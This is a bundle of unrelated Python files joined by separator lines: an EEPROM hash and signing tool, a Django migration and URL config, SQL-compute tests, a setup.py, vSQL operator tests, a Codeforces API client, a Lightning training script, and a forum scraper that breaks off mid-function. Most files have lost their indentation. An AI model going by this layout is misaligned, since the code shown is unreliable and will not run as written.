# @file
# Hashes the EEPROM binary.
#
# Copyright (c) 2015 - 2018, Intel Corporation. All rights reserved.<BR>
#
# This program and the accompanying materials
# are licensed and made available under the terms and conditions of the BSD License
# which accompanies this distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php.
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
#
import os
import struct
import subprocess
import sys
import zlib
# Version defines
__version__ = '0.1.0.1'
VerString = 'EEPROM hash generator, Version #{0}'.format(__version__)
# The following defines are based off of EEPROM layout version #1.00
# We could parse the definition file for these values
BinaryLengthOffset = 0x10
Crc32Offset = 0x14
Crc32LengthOffset = 0x18
HashTypeOffset = 0x10
PromSigStructSize = 0x20
StructureLengthOffset = 0x0C
# The following defines are based off of EEPROM layout version #1.00
# We cannot parse the definition file for these values
HashTypeNone = 0x0000
HashTypeMD5 = 0x0001
HashTypeSHA1 = 0x0002
HashTypeSHA256 = 0x0003
HashTypeSHA384 = 0x0004
HashTypeSHA512 = 0x0005
HashTypeSigningFlag = 0x8000
# Hash digest size defines
MD5DigestSize = 0x10
SHA1DigestSize = 0x14
SHA256DigestSize = 0x20
SHA384DigestSize = 0x30
SHA512DigestSize = 0x40
def CopyFile(Destination, Source, Size):
count = 0
while count < Size:
Destination.write(Source.read(1))
count += 1
return
def Crc32File(File):
CurrentLocation = File.tell()
File.seek (0)
returnValue = (zlib.crc32(File.read()) & 0xFFFFFFFF)
File.seek (CurrentLocation)
return returnValue
def FindStructure(File, Structure):
CurrentLocation = File.tell()
offset = 0
fileSize = GetFileLength(File)
while offset < fileSize:
File.seek(offset)
Signature = struct.unpack('8s', File.read(8))[0]
if Signature == Structure:
return offset
offset += 0x10
File.seek(CurrentLocation)
return fileSize
def GetFileLength(File):
CurrentLocation = File.tell()
File.seek(0, os.SEEK_END)
FileLength = File.tell()
File.seek(CurrentLocation)
return FileLength
def Main():
# Set error return code
ReturnCode = 1
try:
# Set OpenSSL path
OpenSslPath = sys.argv[1]
# Open file for reading, modifying, and in binary mode
BinaryFileName = sys.argv[2]
BinaryFile = open(BinaryFileName, 'r+b')
# Get file length
BinaryFileLength = GetFileLength(BinaryFile)
# Find $PromSig
SignatureLocation = FindStructure(BinaryFile, "$PromSig")
if SignatureLocation == BinaryFileLength:
# Failed to find structure. Bail after printing warning.
print ('WARNING: Failed to find $PromSig structure in {0}'.format(BinaryFileName))
return ReturnCode
# Determine which hashing algorithm to use
BinaryFile.seek(SignatureLocation + HashTypeOffset)
FileHashSize = 0
FileSigSize = 0
HashType = struct.unpack('H', BinaryFile.read(2))[0]
HashingType = ''
SigningFlag = HashType & HashTypeSigningFlag
HashType &= 0x7FFF
if HashType == HashTypeNone:
FileHashSize = 0x00
print('- Nothing to hash. Bailing...')
return ReturnCode
elif HashType == HashTypeMD5:
# MD5 hashing
FileHashSize = MD5DigestSize
HashingType = '-md5'
print('- MD5 hash requested.')
elif HashType == HashTypeSHA1:
# SHA1 hashing
FileHashSize = SHA1DigestSize
HashingType = '-sha1'
print('- SHA1 hash requested.')
elif HashType == HashTypeSHA256:
# SHA256 hashing
FileHashSize = SHA256DigestSize
HashingType = '-sha256'
print('- SHA256 hash requested.')
elif HashType == HashTypeSHA384:
# SHA384 hashing
FileHashSize = SHA384DigestSize
HashingType = '-sha384'
print('- SHA384 hash requested.')
elif HashType == HashTypeSHA512:
# SHA512 hashing
FileHashSize = SHA512DigestSize
HashingType = '-sha512'
print('- SHA512 hash requested.')
else:
print('ERROR: Invalid hash type requested!')
return 1
if SigningFlag == HashTypeSigningFlag:
print('- signing requested.')
if HashType == HashTypeSHA384:
print('ERROR: OpenSSL does not currently support signing SHA384!')
return 1
if HashType == HashTypeSHA512:
print('ERROR: OpenSSL does not currently support signing SHA512!')
return 1
if len (sys.argv) != 4:
print('ERROR: Missing OpenSSL generated private key PEM file!')
return 1
PrivateKeyFileName = sys.argv[3]
FileSigSize = 256
# Update $PromSig.Length
PromSigLength = PromSigStructSize + FileHashSize + FileSigSize
BinaryFile.seek(SignatureLocation + StructureLengthOffset)
WriteBinary(BinaryFile, PromSigLength, 0x04)
# Update $Eeprom$.CrcLength
HeaderLocation = FindStructure(BinaryFile, "$Eeprom$")
if HeaderLocation != 0x00:
print('ERROR: $Eeprom$ structure is not at the beginning of the file!')
return 1
BinaryFile.seek(HeaderLocation + BinaryLengthOffset)
Crc32Length = BinaryFile.read(4)
BinaryFile.seek(HeaderLocation + Crc32LengthOffset)
BinaryFile.write(Crc32Length)
# Update $Eeprom$.Length
BinaryFile.seek(HeaderLocation + BinaryLengthOffset)
WriteBinary(BinaryFile, BinaryFileLength + FileHashSize + FileSigSize, 0x04)
# Update EEPROM header CRC32
HeaderLocation = FindStructure(BinaryFile, "$Eeprom$")
if HeaderLocation != 0x00:
print('ERROR: $Eeprom$ structure is not at the beginning of the file!')
return 1
BinaryFile.seek(HeaderLocation + Crc32Offset)
WriteBinary(BinaryFile, 0x0000, 0x04)
Crc32 = Crc32File(BinaryFile)
print('- CRC32 = {0:08X}'.format (Crc32))
BinaryFile.seek(HeaderLocation + Crc32Offset)
WriteBinary(BinaryFile, Crc32, 0x04)
# Close the file so OpenSSL can get to it
BinaryFile.close()
# Hash the file
subprocess.call([OpenSslPath, 'dgst', HashingType, '-binary', '-out', 'hash.tmp', BinaryFileName])
# Sign the file
if SigningFlag == HashTypeSigningFlag:
subprocess.call([OpenSslPath, 'dgst', HashingType, '-sign', PrivateKeyFileName, '-out', 'sign.tmp', BinaryFileName])
# Add hash to end of the file
HashFile = open('hash.tmp', 'r+b')
BinaryFile = open(BinaryFileName, 'r+b')
BinaryFile.seek(GetFileLength (BinaryFile))
CopyFile(BinaryFile, HashFile, FileHashSize)
BinaryFile.close()
HashFile.close()
os.remove('hash.tmp')
# Add signed hash to end of the file
if SigningFlag == HashTypeSigningFlag:
SignatureFile = open('sign.tmp', 'r+b')
BinaryFile = open(BinaryFileName, 'r+b')
BinaryFile.seek(GetFileLength (BinaryFile))
CopyFile(BinaryFile, SignatureFile, FileSigSize)
BinaryFile.close()
SignatureFile.close()
os.remove('sign.tmp')
# Align file size to paragraphs
BinaryFile = open(BinaryFileName, 'r+b')
BinaryFileLength = GetFileLength(BinaryFile)
AlignmentSize = 0x10 - (BinaryFileLength % 0x10)
if AlignmentSize < 0x10:
BinaryFile.seek(BinaryFileLength)
WriteBinary(BinaryFile, 0x0000, AlignmentSize)
# Clear return code
ReturnCode = 0
finally:
# Close file
BinaryFile.close()
return ReturnCode
def WriteBinary(File, binary, Size):
count = 0
value = binary
while count < Size:
count += 1
# Just want the low byte
temp = value & 0xFF
# Shift right a byte
value >>= 8
# Write the low byte out
File.write(str(chr (temp)))
if __name__ == "__main__":
print('')
print(VerString)
sys.exit(Main())
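# Example invocation (a sketch only; the script file name is illustrative and the
# positional arguments mirror sys.argv[1:] above: the OpenSSL executable path, the
# EEPROM binary to hash, and an optional private key PEM when $PromSig requests signing):
#
#   python EepromHash.py C:\OpenSSL\bin\openssl.exe Eeprom.bin PrivateKey.pem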
|
# Generated by Django 4.0 on 2021-12-12 07:20
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('api', '0004_alter_purchasehistory_product_alter_tag_product'),
]
operations = [
migrations.AddField(
model_name='purchasehistory',
name='purchase_date',
field=models.DateField(default=django.utils.timezone.now),
),
]
|
from __future__ import absolute_import, division, print_function
import pytest
from blaze.compute.sql import compute, computefull, select
from blaze import SQL
from blaze.expr import *
import sqlalchemy
import sqlalchemy as sa
from blaze.compatibility import xfail
from blaze.utils import unique
t = TableSymbol('t', '{name: string, amount: int, id: int}')
metadata = sa.MetaData()
s = sa.Table('accounts', metadata,
sa.Column('name', sa.String),
sa.Column('amount', sa.Integer),
sa.Column('id', sa.Integer, primary_key=True),
)
tbig = TableSymbol('tbig', '{name: string, sex: string[1], amount: int, id: int}')
sbig = sa.Table('accountsbig', metadata,
sa.Column('name', sa.String),
sa.Column('sex', sa.String),
sa.Column('amount', sa.Integer),
sa.Column('id', sa.Integer, primary_key=True),
)
def normalize(s):
return ' '.join(s.strip().split())
def test_table():
result = str(computefull(t, s))
expected = """
SELECT accounts.name, accounts.amount, accounts.id
FROM accounts
""".strip()
assert normalize(result) == normalize(expected)
def test_projection():
print(compute(t[['name', 'amount']], s))
assert str(compute(t[['name', 'amount']], s)) == \
str(sa.select([s.c.name, s.c.amount]))
def test_eq():
assert str(compute(t['amount'] == 100, s)) == str(s.c.amount == 100)
def test_selection():
assert str(compute(t[t['amount'] == 0], s)) == \
str(sa.select([s]).where(s.c.amount == 0))
assert str(compute(t[t['amount'] > 150], s)) == \
str(sa.select([s]).where(s.c.amount > 150))
def test_arithmetic():
assert str(computefull(t['amount'] + t['id'], s)) == \
str(sa.select([s.c.amount + s.c.id]))
assert str(compute(t['amount'] + t['id'], s)) == str(s.c.amount + s.c.id)
assert str(compute(t['amount'] * t['id'], s)) == str(s.c.amount * s.c.id)
assert str(computefull(t['amount'] + t['id'] * 2, s)) == \
str(sa.select([s.c.amount + s.c.id * 2]))
def test_join():
metadata = sa.MetaData()
lhs = sa.Table('amounts', metadata,
sa.Column('name', sa.String),
sa.Column('amount', sa.Integer))
rhs = sa.Table('ids', metadata,
sa.Column('name', sa.String),
sa.Column('id', sa.Integer))
expected = lhs.join(rhs, lhs.c.name == rhs.c.name)
expected = select(list(unique(expected.columns, key=lambda c:
c.name))).select_from(expected)
L = TableSymbol('L', '{name: string, amount: int}')
R = TableSymbol('R', '{name: string, id: int}')
joined = join(L, R, 'name')
result = compute(joined, {L: lhs, R: rhs})
assert str(result) == str(expected)
assert str(select(result)) == str(select(expected))
# Schemas match
assert list(result.c.keys()) == list(joined.columns)
def test_multi_column_join():
metadata = sa.MetaData()
lhs = sa.Table('aaa', metadata,
sa.Column('x', sa.Integer),
sa.Column('y', sa.Integer),
sa.Column('z', sa.Integer))
rhs = sa.Table('bbb', metadata,
sa.Column('w', sa.Integer),
sa.Column('x', sa.Integer),
sa.Column('y', sa.Integer))
L = TableSymbol('L', '{x: int, y: int, z: int}')
R = TableSymbol('R', '{w: int, x: int, y: int}')
joined = join(L, R, ['x', 'y'])
expected = lhs.join(rhs, (lhs.c.x == rhs.c.x)
& (lhs.c.y == rhs.c.y))
expected = select(list(unique(expected.columns, key=lambda c:
c.name))).select_from(expected)
result = compute(joined, {L: lhs, R: rhs})
assert str(result) == str(expected)
assert str(select(result)) == str(select(expected))
# Schemas match
print(result.c.keys())
print(joined.columns)
assert list(result.c.keys()) == list(joined.columns)
def test_unary_op():
assert str(compute(exp(t['amount']), s)) == str(sa.func.exp(s.c.amount))
def test_neg():
    assert str(compute(-t['amount'], s)) == str(-s.c.amount)
def test_reductions():
assert str(compute(sum(t['amount']), s)) == \
str(sa.sql.functions.sum(s.c.amount))
assert str(compute(mean(t['amount']), s)) == \
str(sa.sql.func.avg(s.c.amount))
assert str(compute(count(t['amount']), s)) == \
str(sa.sql.func.count(s.c.amount))
assert 'amount_sum' == compute(sum(t['amount']), s).name
def test_distinct():
result = str(compute(Distinct(t['amount']), s))
assert 'distinct' in result.lower()
assert 'amount' in result.lower()
print(result)
assert result == str(sa.distinct(s.c.amount))
def test_nunique():
result = str(computefull(nunique(t['amount']), s))
print(result)
assert 'distinct' in result.lower()
assert 'count' in result.lower()
assert 'amount' in result.lower()
@xfail(reason="Fails because SQLAlchemy doesn't seem to know binary reductions")
def test_binary_reductions():
assert str(compute(any(t['amount'] > 150), s)) == \
str(sqlalchemy.sql.functions.any(s.c.amount > 150))
def test_by():
expr = by(t, t['name'], t['amount'].sum())
result = compute(expr, s)
expected = sa.select([s.c.name,
sa.sql.functions.sum(s.c.amount).label('amount_sum')]
).group_by(s.c.name)
assert str(result) == str(expected)
def test_by_head():
t2 = t.head(100)
expr = by(t2, t2['name'], t2['amount'].sum())
result = compute(expr, s)
s2 = select(s).limit(100)
expected = sa.select([s2.c.name,
sa.sql.functions.sum(s2.c.amount).label('amount_sum')]
).group_by(s2.c.name)
assert str(result) == str(expected)
def test_by_two():
expr = by(tbig, tbig[['name', 'sex']], tbig['amount'].sum())
result = compute(expr, sbig)
expected = (sa.select([sbig.c.name,
sbig.c.sex,
sa.sql.functions.sum(sbig.c.amount).label('amount_sum')])
.group_by(sbig.c.name, sbig.c.sex))
assert str(result) == str(expected)
def test_by_three():
result = compute(by(tbig,
tbig[['name', 'sex']],
(tbig['id'] + tbig['amount']).sum()),
sbig)
expected = (sa.select([sbig.c.name,
sbig.c.sex,
                           sa.sql.functions.sum(sbig.c.id + sbig.c.amount)])
.group_by(sbig.c.name, sbig.c.sex))
assert str(result) == str(expected)
def test_join_projection():
metadata = sa.MetaData()
lhs = sa.Table('amounts', metadata,
sa.Column('name', sa.String),
sa.Column('amount', sa.Integer))
rhs = sa.Table('ids', metadata,
sa.Column('name', sa.String),
sa.Column('id', sa.Integer))
L = TableSymbol('L', '{name: string, amount: int}')
R = TableSymbol('R', '{name: string, id: int}')
want = join(L, R, 'name')[['amount', 'id']]
result = compute(want, {L: lhs, R: rhs})
print(result)
assert 'join' in str(result).lower()
assert result.c.keys() == ['amount', 'id']
assert 'amounts.name = ids.name' in str(result)
def test_sort():
assert str(compute(t.sort('amount'), s)) == \
str(select(s).order_by(s.c.amount))
assert str(compute(t.sort('amount', ascending=False), s)) == \
str(select(s).order_by(sqlalchemy.desc(s.c.amount)))
def test_head():
assert str(compute(t.head(2), s)) == str(select(s).limit(2))
def test_label():
assert str(compute((t['amount'] * 10).label('foo'), s)) == \
str((s.c.amount * 10).label('foo'))
def test_relabel():
result = compute(t.relabel({'name': 'NAME', 'id': 'ID'}), s)
expected = select([s.c.name.label('NAME'), s.c.amount, s.c.id.label('ID')])
assert str(result) == str(expected)
def test_merge():
col = (t['amount'] * 2).label('new')
expr = merge(t['name'], col)
result = str(compute(expr, s))
assert 'amount * ' in result
assert 'FROM accounts' in result
assert 'SELECT accounts.name' in result
assert 'new' in result
def test_projection_of_selection():
print(compute(t[t['amount'] < 0][['name', 'amount']], s))
assert len(str(compute(t[t['amount'] < 0], s))) > \
len(str(compute(t[t['amount'] < 0][['name', 'amount']], s)))
def test_union():
ts = [TableSymbol('t_%d' % i, '{name: string, amount: int, id: int}')
for i in [1, 2, 3]]
ss = [sa.Table('accounts_%d' % i, metadata,
sa.Column('name', sa.String),
sa.Column('amount', sa.Integer),
sa.Column('id', sa.Integer, primary_key=True)) for i in [1, 2, 3]]
expr = union(*ts)
result = str(select(compute(expr, dict(zip(ts, ss)))))
assert "SELECT name, amount, id" in str(result)
assert "accounts_1 UNION accounts_2 UNION accounts_3" in str(result)
def test_outer_join():
L = TableSymbol('L', '{id: int, name: string, amount: real}')
R = TableSymbol('R', '{city: string, id: int}')
from blaze.sql import SQL
engine = sa.create_engine('sqlite:///:memory:')
_left = [(1, 'Alice', 100),
(2, 'Bob', 200),
(4, 'Dennis', 400)]
left = SQL(engine, 'left', schema=L.schema)
left.extend(_left)
_right = [('NYC', 1),
('Boston', 1),
('LA', 3),
('Moscow', 4)]
right = SQL(engine, 'right', schema=R.schema)
right.extend(_right)
conn = engine.connect()
query = compute(join(L, R, how='inner'), {L: left.table, R: right.table})
result = list(map(tuple, conn.execute(query).fetchall()))
assert set(result) == set(
[(1, 'Alice', 100, 'NYC'),
(1, 'Alice', 100, 'Boston'),
(4, 'Dennis', 400, 'Moscow')])
query = compute(join(L, R, how='left'), {L: left.table, R: right.table})
result = list(map(tuple, conn.execute(query).fetchall()))
assert set(result) == set(
[(1, 'Alice', 100, 'NYC'),
(1, 'Alice', 100, 'Boston'),
(2, 'Bob', 200, None),
(4, 'Dennis', 400, 'Moscow')])
query = compute(join(L, R, how='right'), {L: left.table, R: right.table})
print(query)
result = list(map(tuple, conn.execute(query).fetchall()))
print(result)
assert set(result) == set(
[(1, 'Alice', 100, 'NYC'),
(1, 'Alice', 100, 'Boston'),
(3, None, None, 'LA'),
(4, 'Dennis', 400, 'Moscow')])
# SQLAlchemy doesn't support full outer join
"""
query = compute(join(L, R, how='outer'), {L: left.table, R: right.table})
result = list(map(tuple, conn.execute(query).fetchall()))
assert set(result) == set(
[(1, 'Alice', 100, 'NYC'),
(1, 'Alice', 100, 'Boston'),
(2, 'Bob', 200, None),
(3, None, None, 'LA'),
(4, 'Dennis', 400, 'Moscow')])
"""
conn.close()
def test_summary():
expr = summary(a=t.amount.sum(), b=t.id.count())
result = str(compute(expr, s))
assert 'sum(accounts.amount) as a' in result.lower()
assert 'count(accounts.id) as b' in result.lower()
def test_summary_by():
expr = by(t, t.name, summary(a=t.amount.sum(), b=t.id.count()))
result = str(compute(expr, s))
assert 'sum(accounts.amount) as a' in result.lower()
assert 'count(accounts.id) as b' in result.lower()
assert 'group by accounts.name' in result.lower()
|
from setuptools import setup, find_packages, Command
from os import path
from io import open
import shutil
__CWD = path.abspath(path.dirname(__file__))
with open(path.join(__CWD, 'README.md'), encoding='utf-8') as fstream:
long_description = fstream.read()
pkgversion = '4.0.1'
class Clean(Command):
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
for d in [
'build',
'dist',
'lensesio.egg-info',
'lensesio/__pycache__',
'lensesio/data/__pycache__',
'lensesio/flows/__pycache__',
'lensesio/kafka/__pycache__',
'lensesio/core/__pycache__',
'lensesio/registry/__pycache__',
'.tox',
'venv',
'.pytest_cache',
]:
try:
if path.exists(d):
shutil.rmtree(d)
print("Deleted %s" % d)
except OSError:
print("Error while trying to delete %s" % d)
setup(
name='lensesio',
version=pkgversion,
description='Lenses Python Client',
    long_description=long_description,
long_description_content_type="text/markdown",
url='https://github.com/Landoop/lenses-python',
author='Lenses.io LTD',
author_email='info@lenses.io',
license='Apache License 2.0',
classifiers=[
'Intended Audience :: System Administrators',
'Topic :: Software Development',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
],
keywords='lensesio kafka_integration',
project_urls={
'Documentation': 'https://docs.lenses.io/2.3/dev/python-lib/',
'HomePage': 'https://github.com/lensesio/lenses-python',
},
package_dir={'': '.'},
py_modules=['kafka'],
packages=find_packages(
include=[
'lensesio',
'lensesio.core',
'lensesio.kafka',
'lensesio.flows',
'lensesio.registry',
'lensesio.data',
'lensesio.pulsar'
],
exclude=[]
),
python_requires='>=3',
install_requires=[
'requests==2.25.1',
'websocket-client==0.56.0',
],
extras_require={
'kerberos': [
'kerberos==1.3.0',
],
'pulsar': [
'pulsar-client==2.5.1',
],
'full': [
'pulsar-client==2.5.1',
'kerberos==1.3.0',
],
},
cmdclass={
'clean': Clean,
},
)
|
"""
Tests for the vSQL unary logical "not" operator ``not``.
The tests are done via the Python DB interface.
To run the tests, :mod:`pytest` is required.
"""
from conftest import *
###
### Tests
###
def test_bool1(config_persons):
check_vsql(config_persons, "repr(not app.p_bool_none.value) == 'True'")
def test_bool2(config_persons):
check_vsql(config_persons, "repr(not app.p_bool_false.value) == 'True'")
def test_bool3(config_persons):
check_vsql(config_persons, "repr(not app.p_bool_true.value) == 'False'")
def test_int1(config_persons):
check_vsql(config_persons, "repr(not app.p_int_none.value) == 'True'")
def test_int2(config_persons):
check_vsql(config_persons, "repr(not app.p_int_value.value) == 'False'")
def test_number1(config_persons):
check_vsql(config_persons, "repr(not app.p_number_none.value) == 'True'")
def test_number2(config_persons):
check_vsql(config_persons, "repr(not app.p_number_value.value) == 'False'")
def test_str1(config_persons):
check_vsql(config_persons, "repr(not app.p_str_none.value) == 'True'")
def test_str2(config_persons):
check_vsql(config_persons, "repr(not app.p_str_value.value) == 'False'")
def test_date1(config_persons):
check_vsql(config_persons, "repr(not app.p_date_none.value) == 'True'")
def test_date2(config_persons):
check_vsql(config_persons, "repr(not app.p_date_value.value) == 'False'")
def test_datetime1(config_persons):
check_vsql(config_persons, "repr(not app.p_datetime_none.value) == 'True'")
def test_datetime2(config_persons):
check_vsql(config_persons, "repr(not app.p_datetime_value.value) == 'False'")
def test_datedelta1(config_persons):
check_vsql(config_persons, "repr(not app.p_datedelta_none.value) == 'True'")
def test_datedelta2(config_persons):
check_vsql(config_persons, "repr(not app.p_datedelta_value.value) == 'False'")
def test_datetimedelta1(config_persons):
check_vsql(config_persons, "repr(not app.p_datetimedelta_none.value) == 'True'")
def test_datetimedelta2(config_persons):
check_vsql(config_persons, "repr(not app.p_datetimedelta_value.value) == 'False'")
def test_monthdelta1(config_persons):
check_vsql(config_persons, "repr(not app.p_monthdelta_none.value) == 'True'")
def test_monthdelta2(config_persons):
check_vsql(config_persons, "repr(not app.p_monthdelta_value.value) == 'False'")
def test_color1(config_persons):
check_vsql(config_persons, "repr(not app.p_color_none.value) == 'True'")
def test_color2(config_persons):
check_vsql(config_persons, "repr(not app.p_color_value.value) == 'False'")
def test_geo(config_persons):
check_vsql(config_persons, "repr(not geo(49, 11, 'Here')) == 'False'")
|
import json
import pathlib
from time import time
from urllib.parse import urlencode
from hashlib import sha512, md5
def call_api(parent, endpoint='contest.status', data=None, cache_file=None, cache_time=None):
"""
:param cache_time: TTL of cache (in seconds)
:param cache_file: set cache file e.g. status.json
:param data: other data to send
:param endpoint: API endpoint
:param parent: instance of **Codeforces**
"""
f = None
    if parent.cache:  # caching is enabled
pathlib.Path('cache/').mkdir(parents=True, exist_ok=True)
        if cache_file is not None:  # a specific cache file was requested
f = pathlib.Path(f'cache/{cache_file}.json')
        elif data is not None:  # no cache file given, derive one from the request data
f = pathlib.Path(f'cache/{endpoint}-{md5(json.dumps(data, sort_keys=True).encode("utf-8")).hexdigest()[:5]}.json')
        else:  # nothing specified, fall back to the endpoint name
f = pathlib.Path(f'cache/{endpoint}')
if f.exists() and f.stat().st_size != 0 and int(time()) - int(
f.stat().st_mtime) < (cache_time or 3 * 60):
return json.load(f.open('r'))
    # cache is unusable (missing, empty, or expired)
default_data = {
'apiKey': parent.apiKey,
'time': int(time())
}
if data is None:
data = {}
# merge two dict
final_data = {**data, **default_data}
post_data = urlencode([(k,final_data[k]) for k in sorted(final_data.keys())])
# print(post_data)
api_sig = sha512(f'123456/{endpoint}?{post_data}#{parent.secret}'.encode()).hexdigest()
res = parent.session.get(f'https://codeforces.com/api/{endpoint}?{post_data}',
params={'apiSig': '123456' + api_sig})
api_json = json.loads(res.text)
if api_json['status'] == 'FAILED':
# print(api_json['comment'])
from CodeforcesAPI.Exceptions import CodeforcesCredentialException
raise CodeforcesCredentialException(message=api_json['comment'])
    if parent.cache:  # caching is enabled, store the result
json.dump(api_json['result'], f.open('w+'))
return api_json['result']
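# Example usage (a hypothetical sketch; it assumes a "Codeforces" wrapper object
# that exposes the attributes read above: apiKey, secret, session and cache):
#
#   cf = Codeforces(apiKey='xxxx', secret='yyyy')   # constructor name/signature illustrative
#   submissions = call_api(cf, endpoint='contest.status',
#                          data={'contestId': 566, 'count': 10},
#                          cache_file='status', cache_time=60)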
|
# -*- coding:utf-8 -*-
# Copyright 2014, Rackspace, US, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from django.conf.urls import url
from account.views import AccountRoleViews, AccountRoleListViews
from django.views.decorators.cache import cache_page
urlpatterns = [
# enterprise info
url(r'^role_create', AccountRoleViews.as_view({"post": "role_create"}), name='role_create'),
url(r'^role_update', AccountRoleViews.as_view({"post": "role_update"}), name='role_update'),
url(r'^role_delete', AccountRoleViews.as_view({"post": "role_delete"}), name='role_delete'),
url(r'^query_all_role_info',
AccountRoleViews.as_view({"get": "query_all_role_info"}),
name='query_all_role_info'),
# restful
url(r'^role', AccountRoleListViews.as_view()),
]
|
import hydra
from omegaconf import DictConfig, OmegaConf
from spike.source.model import BasicNet
from spike.source.data import ESDDataModule
from spike.source.utils import set_up_neptune, get_neptune_params, get_default_callbacks
import torch
import pytorch_lightning as pl
pl.seed_everything(23)
def train(FLAGS):
print(OmegaConf.to_yaml(FLAGS))
# ------------
# LR FINDER:
# ------------
datamodule = ESDDataModule(**FLAGS.experiment)
datamodule.prepare_data()
datamodule.setup("fit")
model = BasicNet(**FLAGS.experiment, loss_fn=torch.nn.BCELoss)
trainer = pl.Trainer(**FLAGS.trainer)
lr = trainer.tuner.lr_find(model, datamodule, num_training=500).suggestion()
if lr > 0.1:
lr = FLAGS.optimizer_kwargs["lr"]
print(f"LR to high -> Corrected to {lr}")
if lr < 0.00001:
lr = FLAGS.optimizer_kwargs["lr"]
print(f"LR to low -> Corrected to {lr}")
print(f"Best Learning Rate: {lr}")
FLAGS.optimizer_kwargs["lr"] = lr
# ------------
# data
# ------------
datamodule = ESDDataModule(**FLAGS.experiment)
datamodule.prepare_data()
datamodule.setup("fit")
# ------------
# model
# ------------
model = BasicNet(**FLAGS.experiment, loss_fn=torch.nn.BCELoss)
# ------------
# training
# ------------
callbacks = get_default_callbacks(monitor='val_loss', mode='min', early_stop=False)
trainer = pl.Trainer(**FLAGS.trainer,
callbacks=callbacks,
logger=set_up_neptune(**get_neptune_params(FLAGS, callbacks)))
trainer.fit(model, datamodule)
# ------------
# testing
# ------------
result = trainer.test()
print(result)
@hydra.main(config_path='./source/config/', config_name="spike.yml")
def main(FLAGS: DictConfig):
OmegaConf.set_struct(FLAGS, False)
return train(FLAGS)
if __name__ == '__main__':
main()
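# Example launch (a sketch; the script name is illustrative, Hydra reads
# ./source/config/spike.yml, and the dotted overrides assume the "trainer" and
# "optimizer_kwargs" groups referenced in train()):
#
#   python train.py trainer.max_epochs=50 optimizer_kwargs.lr=0.001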
|
#!/usr/bin/env python3
""" A 巴哈姆特(https://forum.gamer.com.tw/) post library for python.
For more documentation, see README.md . """
import requests
import urllib.parse as urlparse
from bs4 import BeautifulSoup
import re
REQHEADERS = {"User-Agent": ("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 "
"(KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36")}
REQCOOKIES = {}
def from_url(inurl):
""" Initiates a bpl object (BahaPost or Floor) with an URL """
parsed = urlparse.urlparse(inurl)
params = dict(urlparse.parse_qsl(parsed.query))
if (parsed.scheme == "http" and
parsed.netloc == "forum.gamer.com.tw" and
parsed.path == "/C.php" and
all(x in params for x in ["bsn", "snA"])):
return BahaPost(params["bsn"], params["snA"])
elif (parsed.scheme == "http" and
parsed.netloc == "forum.gamer.com.tw" and
parsed.path == "/Co.php" and
all(x in params for x in ["bsn", "sn"])):
return Floor(params["bsn"], params["sn"])
else:
raise ValueError("Input is not a vaild bahaurl.")
def set_cookies(bahaid, baharune):
""" Set baha cookies into global const. """
global REQCOOKIES
if len(baharune) == 84:
REQCOOKIES = {"BAHAID": bahaid, "BAHARUNE": baharune}
else:
        raise ValueError('Input is not a valid baharune.')
return None
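# Example usage (a sketch; the bsn/snA values and cookie strings below are
# hypothetical, and the module is referred to as "bpl" as in the docstrings):
#
#   import bpl
#   bpl.set_cookies("myBahaId", "<84-character BAHARUNE cookie value>")
#   post = bpl.from_url("http://forum.gamer.com.tw/C.php?bsn=60076&snA=1")
#   print(post.content)             # HTML of the main floor
#   print(post.floors[0].comments)  # comments on the main floor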
class BahaPost:
""" An object class used to describe a baha post. """
def __init__(self, bsn, sna):
""" Initiates a BahaPost object """
self.bsn = bsn
self.sna = sna
self.url = ("http://forum.gamer.com.tw/C.php?" +
"bsn=" + str(self.bsn) + "&" + "snA=" + str(self.sna))
@property
def floors_snb(self):
""" snb list of the BahaPost """
ret = []
soup = BeautifulSoup(
requests.get("http://forum.gamer.com.tw/C.php",
params={"bsn": self.bsn, "snA": self.sna},
headers=REQHEADERS,
cookies=REQCOOKIES).text
)
for gpword in soup("a", {"class": "GPword"}):
ret.append(
re.search(r'upgp_(\d+)', gpword.attrs["id"]).group(1))
return ret
@property
def floors(self):
""" Floor object list of the BahaPost """
ret = []
for snb in self.floors_snb:
ret.append(
Floor(self.bsn, snb))
return ret
@property
def content(self):
""" The content of the main floor
An alias for html
"""
return self.floors[0].html
@property
def html(self):
""" The content of the main floor in HTML """
return self.floors[0].get_content(baha_code=False, prettify=True)
@property
def baha_code(self):
""" The content of the main floor in baha_code, from /post1.php
        Requires valid BAHARUNE and BAHAID cookies."""
return self.floors[0].get_content(baha_code=True, prettify=False)
@property
def comments(self):
""" The comment of the main floor """
return self.floors[0].comments
class Floor:
""" An object class used to describe floors of baha posts """
def __init__(self, bsn, snb):
""" Initiates a floor object """
self.bsn = str(bsn)
self.snb = str(snb)
soup = BeautifulSoup(requests.get("http://forum.gamer.com.tw/Co.php",
params={"bsn": bsn, "sn": snb},
headers=REQHEADERS,
cookies=REQCOOKIES).text)
for p_item in soup(id="BH-master")[0]("p", {"class": "FM-lbox1"}):
parsed = urlparse.urlparse(p_item.a.attrs["href"])
params_ = dict(urlparse.parse_qsl(parsed.query))
if parsed.path == 'switch.php' and "bsn" in params_:
self.sna = params_["snA"]
break
@property
def content(self):
""" The floor's content in html
An alias for html """
return self.html
@property
def html(self):
""" The floor's content in baha_code, from /Co.php """
return self.get_content(baha_code=False, prettify=True)
@property
def baha_code(self):
""" The floor's content in baha_code, from /post1.php
        Requires valid BAHARUNE and BAHAID cookies. """
return self.get_content(baha_code=True, prettify=False)
def get_content(self, baha_code=False, prettify=True):
